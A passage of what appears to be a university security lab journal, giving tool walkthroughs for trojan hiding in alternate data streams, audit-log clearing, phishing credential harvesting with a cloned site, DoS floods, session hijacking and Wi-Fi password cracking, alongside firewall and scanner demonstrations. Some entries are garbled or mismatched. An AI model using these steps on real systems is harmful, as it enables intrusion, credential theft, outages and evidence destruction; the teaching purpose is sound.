The following command can be used to view or modify the stream hidden in file_1.txt notepad
file_1.txt:[Link]

pg. 73
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Note: Notepad is a stream-compliant application. Never use alternative streams to store sensitive
information.

Hiding [Link] in [Link] file stream:

The following command has used the copy the [Link] into a [Link](stream)

C:\test>type [Link] > [Link]:[Link]

Here type command is used to hide trojan in the ADS inside an existing file.

After hiding [Link] behind [Link], we need to create a link to launch the [Link] file from
the stream. The following command is used to create a shortcut in the stream.

C:\test>mklink [Link] [Link]:[Link]

Type [Link] to run the trojan that is hidden behind the [Link]. Here, [Link] is the
shortcut created to launch [Link].

pg. 74
[Link]. IT Sem III Security Breaches and Countermeasures Journal
vi. ADS Spy
AdSpy offers the most search options of any Ad Intelligence Tool, so you can find the data you
want, how you want. Search in the usual way: ad text, URL, page name. Search true data from
user reactions in advert comments. Be as rigorous as you need to: search or filter by affiliate
network, affiliate ID, Offer ID, landing page technologies - whatever helps you find the
information you can work with. Open ADS Spy application and select the option if you want to:
 Quick Scan
 Full Scan
 Scan Specific Folder

As we store the file in the Document folder, Selecting Document folder to scan particular folder
only.

Select an Option, if you want to scan for ADS, click “Scan the system for ADS”/ or click
removes button to remove the file

pg. 75
[Link]. IT Sem III Security Breaches and Countermeasures Journal

As shown in the figure below, ADS Spy has detected the [Link]:[Link] file from the
directory.

vii. Snow
Create a text file with some data in the same directory where Snow Tool is installed.

pg. 76
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Go to Command Prompt
Change the directory to run Snow tool

Type the command


Snow –C –m “text to be hide” –p “password” <Sourcefile> <Destinationfile>

The source file is a [Link] file as shown above. Destination file will be the exact copy of
source file containing hidden information.

Go to the directory; you will a new file [Link]. Open the File

New File has the same text as an original file without any hidden information. This file can be
sent to the target.
Recovering Hidden Information
On destination, Receiver can reveal information by using the command
Snow –C –p “password123” [Link]

pg. 77
[Link]. IT Sem III Security Breaches and Countermeasures Journal

As shown in the above figure, File decrypted, showing hidden information encrypted in the
previous section.

viii. Quickstego
Image Steganography using QuickStego
1. Open QuickStego Application

2. Upload an Image. This Image is term as Cover, as it will hide the text.

pg. 78
[Link]. IT Sem III Security Breaches and Countermeasures Journal
3. Enter the Text or Upload Text File

4. Click Hide Text Button

5. Save Image
This Saved Image containing Hidden information is termed as Stego Object.

Recovering Data from Image Steganography using QuickStego


1. Open QuickStego
2. Click Get Text

pg. 79
[Link]. IT Sem III Security Breaches and Countermeasures Journal

3. Open and Compare Both Images


Left Image is without Hidden Text; Right Image is with hidden text

ix. Clearing Audit Policies


Enabling and Clearing Audit Policies
To check command’s available option Enter
C:\Windows\system32> auditpol /?

Enter the following command to enable auditing for System and Account logon: -
C:\Windows\system32>auditpol /set /category:"System","Account
pg. 80
[Link]. IT Sem III Security Breaches and Countermeasures Journal
logon" /success:enable /failure:enable

To check Auditing is enabled, enter the command


C:\Windows\system32>auditpol logon","System"/get /category:"Account

To clear Audit Policies, Enter the following command


C:\Windows\system32>auditpol /clear
Are you sure (Press N to cancel or any other key to continue)?Y

To check Auditing, enter the command


C:\Windows\system32>auditpol /get /category:"Account logon","System"

pg. 81
[Link]. IT Sem III Security Breaches and Countermeasures Journal

x. Clearing Logs
1. Go to Kali Linux Machine

2. Open the /var directory:

pg. 82
[Link]. IT Sem III Security Breaches and Countermeasures Journal

3. Go to Logs folder:

pg. 83
[Link]. IT Sem III Security Breaches and Countermeasures Journal
4. Select any log file:

5. Open any log file; you can delete

pg. 84
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 5
a. Use wireshark to sniff the network.
Wireshark is a GUI-based packet capture program. As noted, it comes with some command-line
programs. There are a lot of advantages to using Wireshark. First, it gives us a way to view the
packets easily, moving around the complete capture. Unlike with tcpdump and tshark, we see the
entire network stack in Wireshark, which technically makes what we have captured frames rather
than packets.
• Start Wireshark. Under the “Capture” header, select the “Interface List” option; or
click on the “Interfaces” button on the toolbar:
This will bring up a list of network interfaces that Wireshark is able to capture
packets from:

List of available capture interfaces


Select the network adapter (wired or wireless) that you are currently using to connect to
the Internet, and hit the “Start” button. This will take you to the main window:

pg. 85
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Wireshark is now capturing live network activity on your network interface. Notice that
the list of packets is color-coded to highlight different types of network traffic.
 Open your web browser and navigate to a few random web pages - observe that
the network packets corresponding to your web browsing activity are captured and
show up in Wireshark as well.
 By default, the list of captured packets will keep scrolling automatically during
a live capture. You can toggle this on/off using the AutoScroll toggle button in
the toolbar.

 After letting the capture run for a couple of minutes, press the stop capture
button. Do not close this capture session.
Filtering the Packet List
Capturing network traffic for a couple minutes could include traffic on many different
protocols such as ARP, TCP, UDP, DNS, HTTP, etc.

We may not be interested in all of these, depending on what we are trying to achieve.
Fortunately, Wireshark allows us to filter the list based on different criteria using the
“Filter” toolbar:

Filter toolbar
Let us take a look at the HTTP traffic that occurs when we browse the web.
In the filter toolbar, type “http” and then click on “Apply”. The window will
now list only captured packets related to HTTP traffic:

pg. 86
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Examining HTTP Traffic
The HTTP traffic that occurs during web browsing.
• Stop and close any capture that you may have open, and start a new capture.
• Set the filter to show only HTTP traffic.
Start with the HTTP request sent from your web browser.
• In your web browser, navigate to some webpage like
[Link]
• In the top frame of the Wireshark main window, look for the packet that
corresponds to your request. This contains the URL in the “Info” section. Select
this packet.
• In the middle frame of the Wireshark window, expand the “Hypertext Transfer
Protocol” section. Notice the details given for the:
o GET request
o Host
o User-Agent
o Accepts
o cookie
o etc

Take a look at the HTTP response to the above request.

In the top frame of the Wireshark main window, find and select the “HTTP/1.1 200 OK”
packet immediately below the request for [Link]. This is the response containing the
requested web page.
pg. 87
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Again, expand the “Hypertext Transfer Protocol” section. Notice the details given for
o Cache-Control
o Content-Type
o Server
o Etc

Details of incoming HTTP response corresponding to [Link]

b. Use SMAC for MAC Spoofing.


SMAC is a MAC address changer that has a simple-to-use graphical interface that enables the
less experienced user all the way up to the guru to change a piece of hardware’s MAC address.
The less experienced user will appreciate the random generator whereas the guru will appreciate
the ability to hand enter a new MAC address.

Once it is installed, you will find the application launcher in a Start Menu subdirectory called
KLC. Click on that folder and you will see SMAC 2.0. Click on that launcher and the SMAC
main window (Figure A) will open.

Using SMAC can be very simple, depending on how you want to use it. The simplest way to use
SMAC is to assign a random MAC address to a piece of hardware. Before we actually assign a
new address, let’s take a look at the other hardware on the machine. In the main window there is
a check box that tells SMAC to show only active hardware. This checkbox is checked by default.
Uncheck that box and your listing will grow, depending on the hardware on your machine. Take
a look at Figure B to see how much the listing grows on my laptop that includes wireless, wired,
and dial-up connections.

pg. 88
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Figure A

Figure B

When you click on a different listing, the information about that hardware will be
displayed below.

Let’s change the MAC address of the Wired Marvell Yukon PCI-E Faster Ethernet Controller.
To do this, select that entry from the list and click the Random button. As you can see in Figure
C, the new, random MAC address is displayed in the New Spoofed MAC Address section.

pg. 89
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Figure C

The address listed will correspond to a manufacturer list that you can choose from.

If you know you want to spoof your MAC address to that of a specific manufacturer you can
select a different manufacturer from the drop-down list. When you make this selection, the
address listed will change. You can keep hitting Random until you get an address you like (or
you can just take the first random address you get).

Once you have your address, select the Options menu and make sure Automatically Restart
Adapter is checked. Once that is checked, hit the Update MAC Address button and the new
MAC address will be applied.

c. Use Caspa Network Analyser.


When we correctly deployed Capsa, we cannot wait to start our first capture right away. Capsa
7's new Start Page guides us start an accurate capture mission step by step:

pg. 90
[Link]. IT Sem III Security Breaches and Countermeasures Journal

1. Double-click icon on the desktop.


2. In the Start Page, select your NICs (multiple selections available) in the Capture panel
first.

3. Select any Network Profile in the Network Profile panel.

4. Select Full Analysis in the Analysis Profile panel.

pg. 91
[Link]. IT Sem III Security Breaches and Countermeasures Journal

5. Click the big Run button to start a capture right away.

This is the common procedure to start a capture, which helps us get accurate and useful analysis
data: Select NIC -> Select Network Profile -> Select Analysis Profile -> Run.

d. Use Omnipeek Network Analyzer.


Omnipeek is a high-performance network protocol analyzer, capable of decoding thousands of
protocols for fast network troubleshooting and diagnostics, anywhere network issues happen.

Real-Time Network Protocol Analyzer

Omnipeek provides real-time analysis for every type of network segment – 1/10/40/100 Gigabit,
802.11, and voice and video over IP – and for every level of network traffic.

pg. 92
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Intuitive Graphic Displays and Visualization
Omnipeek delivers intuitive visualization and effective forensics for faster resolution of network
and application performance issues and security investigations.

Best-In-Class Network Analysis Workflow


Widely recognized as the best network analysis workflow in the industry, we make it easy to
drill down to a single packet – all from a single pane of glass.

WiFi Troubleshooting
The Omnipeek WiFi adaptor is a USB-connected WLAN device designed for wireless packet
capture. The 802.11ac adapter supports 802.11ac capture up to 2 transmit/receive streams
(866Mbps wireless traffic) and supports 20MHz, 40MHz, and 80MHz channel operation.

pg. 93
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Monitor Distributed Networks Remotely

Integrating with LiveCapture, Omnipeek extends network monitoring and visibility for
troubleshooting application-level issues at remote sites and branches, WAN links, and data
centers.

Voice and Video Monitoring and Troubleshooting

Monitor and troubleshoot voice and video over IP traffic in real-time with high-level multi-
media summary statistics, call playback, and comprehensive signaling and media analyses.

pg. 94
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Simplify Troubleshooting Remote Devices

Easily troubleshoot end-user devices remotely and securely with encrypted files, avoiding the
need to travel to a user’s location.

pg. 95
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 6
a. Use Social Engineering Toolkit on Kali Linux to perform Social
Engineering using Kali Linux.
We are using Kali Linux Social Engineering Toolkit to clone a website and send clone link to
victim. Once Victim attempt to login to the website using the link, his credentials will be
extracted from Linux terminal.

Procedure:
1. Open Kali Linux

2. Go to Application

pg. 96
[Link]. IT Sem III Security Breaches and Countermeasures Journal

3. Click Social Engineering Tools


4. Click Social Engineering Toolkit

5. Enter “Y” to proceed.

pg. 97
[Link]. IT Sem III Security Breaches and Countermeasures Journal

6. Type “1” for Social Engineering Attacks

7. Type “2” for website attack vector

pg. 98
[Link]. IT Sem III Security Breaches and Countermeasures Journal

8. Type “3” for Credentials harvester attack method

9. Type “2” for Site Cloner

pg. 99
[Link]. IT Sem III Security Breaches and Countermeasures Journal

10. Type IP address of Kali Linux machine ( [Link] in our case).

11. Type target URL

pg. 100
[Link]. IT Sem III Security Breaches and Countermeasures Journal

12. Now, [Link] will be used. We can use this address directly, but it is not an
effective way in real scenarios. This address is hidden in a fake URL and forwarded to the
victim. Due to cloning, the user could not identify the fake website unless he observes the URL.
If he accidentally clicks and attempts to log in, credentials will be fetched to Linux terminal. In
the figure below, we are using [Link] to proceed.

13. Login using username and Password


Username: admin
Password: Admin@123

pg. 101
[Link]. IT Sem III Security Breaches and Countermeasures Journal
14. Go back to Linux terminal and observe.

Username admin and password is extracted. If the user types it correctly, exact spelling can be
used. However, you will get the closest guess of user ID and password. The victim will observe
a page redirect, and he will be redirected to a legitimate site where he can re-attempt to log in
and browse the site.

b. Perform the DDOS attack using the following tools:


i. HOIC
High Orbit Ion Cannon (HOIC) is a free, open-source network stress application developed by
Anonymous, a hacktivist collective, to replace the Low Orbit Ion Cannon (LOIC). Used
for denial of service (DoS) and distributed denial of service (DDoS) attacks, it functions by
flooding target systems with junk HTTP GET and POST requests.
Widespread HOIC availability means that users having limited knowledge and experience can
execute potentially significant DDoS attacks. The application can open up to 256 simultaneous
attack sessions at once, bringing down a target system by sending a continuous stream of junk
traffic until legitimate requests are no longer able to be processed.

pg. 102
[Link]. IT Sem III Security Breaches and Countermeasures Journal

ii. LOIC

The LOIC was originally developed by Praetox Technologies as a stress testing application
before becoming available within the public domain. The tool is able to perform a simple dos
attack by sending a large sequence of UDP, TCP or HTTP requests to the target server. It’s a
very easy tool to use, even by those lacking any basic knowledge of hacking. The only thing a
user needs to know for using the tool is the URL of the target. A would-be hacker need only then
select some easy options (address of target system and method of attack) and click a button to
start the attack.

The tool takes the URL of the target server on which you want to perform the attack. You can
also enter the IP address of the target system. The IP address of the target is used in place of an
internal local network where DNS is not being used. The tool has three chief methods of attack:
TCP, UDP and HTTP. You can select the method of attack on the target server. Some other
options include timeout, TCP/UDP message, Port and threads. See the basic screen of the tool in
the snapshot above in Figure.

pg. 103
[Link]. IT Sem III Security Breaches and Countermeasures Journal

 Step 1: Run the tool.


 Step 2: Enter the URL of the website in The URL field and click on Lock O. Then, select
attack method (TCP, UDP or HTTP). I will recommend TCP to start. These 2 options are
necessary to start the attack.

Figure3: LOIC in action (I painted the URL and IP white to hide the identity of the victim in
snap)

 Step 3: Change other parameters per your choice or leave it to the default. Now click on
the Big Button labeled as “IMMA CHARGIN MAH LAZER.” You have just mounted an
attack on the target.
pg. 104
[Link]. IT Sem III Security Breaches and Countermeasures Journal
After starting the attack you will see some numbers in the Attack status fields. When the
requested number stops increasing, restart the LOIC or change the IP. You can also give the
UDP attack a try. Users can also set the speed of the attack by the slider. It is set to faster as
default but you can slow down it with the slider. I don’t think anyone is going to slow down the
attack.

iii. HULK
HULK is an abbreviation for HTTP Unbearable Load King, which is a web server Distributed Denial of
Service tool. It is mainly designed for research purpose, and helps pen testers check the efficiency of a
server. With its help, security specialists can find loopholes in their security implementation against
DDoS, and correct them before an actual threat actor exploits it.

Hulk begins the HTTP flooding attack with a typical TCP handshake. So, the SYN request is
sent first, SYN ACK comes the next, and ACK thereafter.

Once the first request bypasses the hurdles, the user agent starts sending diverse HTTP GET
requests to the target URL. For this, it makes use of a randomized suffix.

Observation 4

The host sends out various HTTP GET requests with different/randomized suffices and receives
the response as 200 (OK).

pg. 105
[Link]. IT Sem III Security Breaches and Countermeasures Journal

iv. Metasploit

First, select your target’s IP address. I am taking [Link] as a victim. So you


know how to get an IP address from a domain name. Simple doping and that will give to domain
IP address.

So now I know the victim’s IP Address [Link].

Launching Metasploit by typing msfconsole in your kali terminal

pg. 106
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Then use the select the auxiliary “auxiliary/dos/TCP/synflood” by typing the following
command.

Msf6 > use auxiliary/dos/tcp/synflood

Msf6> show options

Now you can see you have all the available options that you can set.
pg. 107
[Link]. IT Sem III Security Breaches and Countermeasures Journal
To set an option just you have to typeset and the option name and option.

You have to set two main option

RHOST= target IP Address

RPORT=target PORT Address

Set RPORT [Link]

Set RPORT 80

To launch the attack just type.

exploit

pg. 108
[Link]. IT Sem III Security Breaches and Countermeasures Journal
to see the packets you can open Wireshark.

So that’s how you can perform a DOS attack.

c. Using Burp Suite to inspect and modify traffic between the browser and
target application.

Burp Suite is a fully featured web application attack tool: it does almost anything that you could
ever want to do when penetration testing a web application.

One of Burp Suite’s main features is its ability to intercept HTTP requests. Normally HTTP
requests go from your browser straight to a web server and then the web server response is sent
back to your browser. With Burp Suite, however, HTTP requests go from your browser straight
to Burp Suite, which intercepts the traffic.

pg. 109
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 110
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 7
a. Perform Web App Scanning using OWASP Zed Proxy.
Zed Attack Proxy (ZAP) is a free, open-source penetration testing tool being maintained under
the umbrella of the Open Web Application Security Project (OWASP). ZAP is designed
specifically for testing web applications and is both flexible and extensible.

To run a Quick Start Automated Scan :

1. Start ZAP and click the Quick Start tab of the Workspace Window.
2. Click the large Automated Scan button.
3. In the URL to attack text box, enter the full URL of the web application you want to
attack.
4. Click the Attack

pg. 111
[Link]. IT Sem III Security Breaches and Countermeasures Journal

ZAP will proceed to crawl the web application with its spider and passively scan each page it
finds. Then ZAP will use the active scanner to attack all of the discovered pages, functionality,
and parameters.

ZAP provides 2 spiders for crawling web applications, you can use either or both of them from
this screen.

The traditional ZAP spider which discovers links by examining the HTML in responses from the
web application. This spider is fast, but it is not always effective when exploring an AJAX web
application that generates links using JavaScript.

b. Use droidsheep on mobile for session hijacking


DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP
packets sent via a wireless (802.11) network connection and extracts the session id from these
packets in order to reuse them.
DroidSheep can capture sessions using the libpcap library and supports: OPEN Networks WEP
encrypted networks WPA and WPA2 encrypted networks (PSK only). This software uses
libpcap and arpspoof. DroidSheep has been developed with support of the information security
team of the University of Trier.

pg. 112
[Link]. IT Sem III Security Breaches and Countermeasures Journal

c. Demonstrate the use of the following firewalls:


i. Zonealarm and analyse using Firewall Analyzer.

To open the ZoneAlarm client interface, do one of these:

 Double-click on the ZoneAlarm Security desktop icon.


 Go to MS Windows Start Menu > Check Point > ZoneAlarm > ZoneAlarm Security.
 Use the ZoneAlarm icon in the MS Windows system notification area ("MS Windows
System Notification Area Icons and Menus" on page 14).
The startup page of the ZoneAlarm software client interface consists of these
components:
 The main status bar - shows you if YOUR COMPUTER IS SECURE or YOUR
COMPUTER IS AT RISK. If the computer is at risk, you can click Fix Now to quickly
fix the security problem.
 The three panels:
1. ANTIVIRUS & FIREWALL - lets you configure the Antivirus and Anti-spyware
("Protecting Your Computer With Antivirus/Anti-Spyware" on page 15) settings,
the Firewall "Protecting Your Computer with ZoneAlarm Firewall" on page 30
settings, the Application Control ("Using Application Control for Application
Security" on page 44) settings, and the Threat Emulation ("Using Threat
Emulation Against Zero-Day Attacks" on page 28) settings
2. WEB & PRIVACY - lets you configure enable or disable Anti-Keylogger ("Using
Anti-Keylogger" on page 65)
3. MOBILITY & DATA - lets you configure Identity Protection ("Identity
Protection Service (USA Only)" on page 68) settings.

pg. 113
[Link]. IT Sem III Security Breaches and Countermeasures Journal

ii. Comodo Firewall


Comodo Internet Security offers 360° protection against internal and external threats by
combining a powerful antivirus, an enterprise class packet filtering firewall, and a threat
containment system which automatically runs unrecognized files in a secure, virtual
environment.

pg. 114
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Click 'Tasks' > 'Firewall Tasks'
 The firewall offers the following main benefits
 Monitor all network traffic to protect your computer against inbound and outbound
threats
 Hides your computer's ports from hackers
 Blocks malicious software from transmitting your confidential data over the internet
 The firewall tasks area lets you configure internet access rights per-application, stealth
your computer ports, view active connections, and even block all traffic in and out of
your computer
 In addition to this tasks screen, you can also configure advanced firewall settings at
'Settings' > 'Firewall'.

d. Use HoneyBOT to capture malicious network traffic.

HoneyBot is a set of scripts and libraries for capturing and analyzing packet captures with
[Link]. Currently, this library provides three scripts:

 [Link] - Capture on an interface for some period of time, and upload


capture for analysis.
 [Link] - Upload and analyze multiple packets captures to
[Link].
pg. 115
[Link]. IT Sem III Security Breaches and Countermeasures Journal
 [Link] - Listen for unknown connections, and begin capturing when
one is made. Captures are automatically uploaded and analyzed.

[Link]
usage: [Link] [-h] [--seconds SECONDS] [--interface INTERFACE]
[--analyze] [--list-interfaces] [--list-pcaps]
[--export-pcaps]

Capture, upload and analyze network traffic; powered by [Link].

optional arguments:
-h, --help show this help message and exit
--seconds SECONDS The number of seconds to capture traffic for.
--interface INTERFACE
The name of the interface (--list-interfaces to show
available)
--analyze If included, capture will be uploaded for analysis to
[Link].
--list-interfaces Lists the available interfaces.
--list-pcaps Lists pcaps submitted to [Link] for analysis.
--export-pcaps Writes pcaps submitted to [Link] for analysis
to a csv file.

e. Use the following tools to protect attacks on the web servers:


i. ID Server
Download and install ID Server tool.
1. Enter URL or IP address of the target server

2. Enter the Query The Server/button.

pg. 116
[Link]. IT Sem III Security Breaches and Countermeasures Journal

3. Copy the Extracted information.

Information such as Domain name, open ports, Server type and other information are extracted.

ii. Microsoft Baseline Security Analyzer


The Microsoft Baseline Security Analyzer is a Windows-based Patch management tool
powered by Microsoft. MBSA identify the missing security updates and common security
misconfigurations.

MBSA is capable of scanning Local system, remote system, and range of the computer.

pg. 117
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Select the scanning options as required

MBSA will first get updates from Microsoft, Scan, and then download the security updates.

pg. 118
[Link]. IT Sem III Security Breaches and Countermeasures Journal

In the above figure, MBSA Scanning result showing Security Update Scan Results. Security
Update scan results are categorized by issue and results showing a number of missing updates.

pg. 119
[Link]. IT Sem III Security Breaches and Countermeasures Journal

In the figure above, MBSA Scanning result showing Administrative Vulnerabilities.


Vulnerabilities such as Password expiry, updates, firewalls issues, accounts and other
vulnerabilities are mentioned.

pg. 120
[Link]. IT Sem III Security Breaches and Countermeasures Journal

In the above figure, MBSA Scanning result showing System information, IIS scan results,
SQL Server Result and Desktop application results.

iii. Syhunt Hybrid


Using Syhunt Hybrid, go to Dynamic Scanning. This package also supports Code Scanning
and Log Scanning.

pg. 121
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Enter the URL or IP address

Showing Scanning Results, you click on the vulnerability to check the issue and its solution.

pg. 122
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Showing Description of vulnerability detected by the tool. Solution tool will provide a
recommendation to resolve the issue.

pg. 123
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 8
a. Protect the Web Application using dotDefender.
dotDefender allows businesses to protect external websites and internal applications in an
affordable, effective and simple manner without involving costly security experts. dotDefender
is a multi-platform solution running on Apache and IIS web servers. Central management
ensures a single point of control and reporting for all servers.

You can modify the Default Security Profile or any of the Website Security Profiles.

pg. 124
[Link]. IT Sem III Security Breaches and Countermeasures Journal

b. Demonstrate the following tools to perform SQL Injection:


i. Tyrant SQL
Tyrant SQL is a Havij based cross-platform. It's Sqlmap's gui version.

ii. Havij
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL
Injection vulnerabilities on a web page.
pg. 125
[Link]. IT Sem III Security Breaches and Countermeasures Journal

iii. BBQSQL
BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when
attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing
quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to
be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up
attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

pg. 126
[Link]. IT Sem III Security Breaches and Countermeasures Journal

pg. 127
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 9

Use Aircrack-ng suite for wireless hacking and countermeasures.


In this case, we have captured some 802.11 (Wireless Network) packets and save the file. Using
this file with “Cupp” and “Aircrack-ng.”,we will create a password file and crack the
password.
Procedure:
1. Capture some wlan packets using filter “[Link]==aa:bb:cc:dd:ee” and save the file.
2. Go to Kali Linux terminal.
3. Change the directory to the desktop.
root@kali:~# cd Desktop
4. Download the “Cupp” utility to create wordlist
root@kali:~# git clone [Link]

5. Change the directory to /Desktop/Cupp


root@kali:~/Desktop# cd cupp
6. List the folders in the current directory.
root@kali:~/Desktop/cupp# ls
7. Run the utility [Link]
root@kali:~/Desktop/cupp# ./[Link]

pg. 128
[Link]. IT Sem III Security Breaches and Countermeasures Journal

[Link] Interactive Question for user password profiling


root@kali:~/Desktop/cupp# ./[Link] -i

9. Provide the closest information about the target. It will increase the chances of successful
cracking.
10. You can add keywords.
11. You can add special characters.
12. You can add random numbers.
13. You can enable leet mode.
pg. 129
[Link]. IT Sem III Security Breaches and Countermeasures Journal

[Link] successful completion, you find a new text file named as the first name you type in
interactive option. This file will contain a lot of possible combinations. As shown in the figure
below, [Link] file has been created in the current directory

15. You can check the file by opening it.

pg. 130
[Link]. IT Sem III Security Breaches and Countermeasures Journal

16. Now crack the password using Aircrack-ng with the help of password file created.
root@kali:~ # cd
root@kali:~ # aircrack-ng –a2 –b <BSSID of WLAN Router> -w
/root/Desktop/cupp/[Link] ‘/root/Desktop/[Link]’

[Link] is captured packet file.

17. This will start the process, and all keys will be checked

pg. 131
[Link]. IT Sem III Security Breaches and Countermeasures Journal

18. The result will either show you the key or refuse to crack from the dictionary

pg. 132
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Practical No. 10

Use the following tools for cryptography


i. HashCalc
Calculating MD5 value using HashCalc
1. Open HashCalc tool.

2. Create a new file with some content in it as shown below.

3. Select Data Format as “File” and upload your file


pg. 133
[Link]. IT Sem III Security Breaches and Countermeasures Journal

4. Select Hashing Algorithm and Click Calculate

pg. 134
[Link]. IT Sem III Security Breaches and Countermeasures Journal
5. Now Select the Data Format to “Text String” and Type “IPSpecialist…” into Data filed and
calculated MD5.

MD5 Calculated for the text string “IPSpecialist…” is


“a535590bec93526944bd4b94822a7625”
6. Now, let's see how MD5 value is changed from minor change.

pg. 135
[Link]. IT Sem III Security Breaches and Countermeasures Journal

Just lowering the case of single alphabet changes entire hashing value. MD5 Calculated for the
text string “IPspecialist…” is “997bd71ad0158de71f6e97a57261b9a7”

ii. Advanced Encryption Package


1. Download and Install Advance Encryption Package Latest Version. In this Lab, we are using
Advanced Encryption Package 2014 and 2017 to ensure compatibilities on Windows 7 and
Windows 10.

pg. 136
[Link]. IT Sem III Security Breaches and Countermeasures Journal

2. Select the File you want to Encrypt.


3. Set password
4. Select Algorithm

5. Click Encrypt

pg. 137
[Link]. IT Sem III Security Breaches and Countermeasures Journal

6. Compare both Files

7. Now, After forwarding it to another PC, in our case, in Windows 10 PC, decrypting it using
Advanced Encryption package 2017.
8. Enter password

pg. 138
[Link]. IT Sem III Security Breaches and Countermeasures Journal
9. File Successfully decrypted.

iii. TrueCrypt
TrueCrypt is a leading disk encryption software program that lets you secure disk partitions
on your Windows computer. There are times when your hard drive is accessible by other people,
such as in an office setting, while travelling, or at home. The data you have on the PC may be
vulnerable to attack and compromise your privacy. However, in these moments of risk,
TrueCrypt may just be the tool to protect your data.

pg. 139
[Link]. IT Sem III Security Breaches and Countermeasures Journal
Click Next two times on the following screens to create an encrypted file container with a
standard TrueCrypt volume (those are the default options). Click Select File and browse to a
location where you want to create the new container. Make sure it is not in the Dropbox folder
if Dropbox is running. You can name the container anyway you want, e.g. [Link].

Click Next on the encryption options page unless you want to change the encryption algorithm or
hash algorithm. Select the volume size on the next screen. I suggest you keep it at a few hundred
Megabytes tops.

You need to enter a secure password on the next screen. It is suggested to use as many characters
as possible (24+) with upper and lower letters, numbers and special characters. The maximum
length of a True Crypt password is 64 characters.

Now it is time to select the volume format on the next screen. If you only use Windows
computers you may want to select NTFS as the file system. If you use others you may be better
of with FAT. Juggle the mouse around a bit and click on format once you are done with that.

Congratulations, the new True Crypt volume has been created.

iv. CrypTool
Cryptool is a free e-learning tool to illustrate the concepts of cryptography. Try Various
Encryption/Decryption algorithms.

pg. 140

You might also like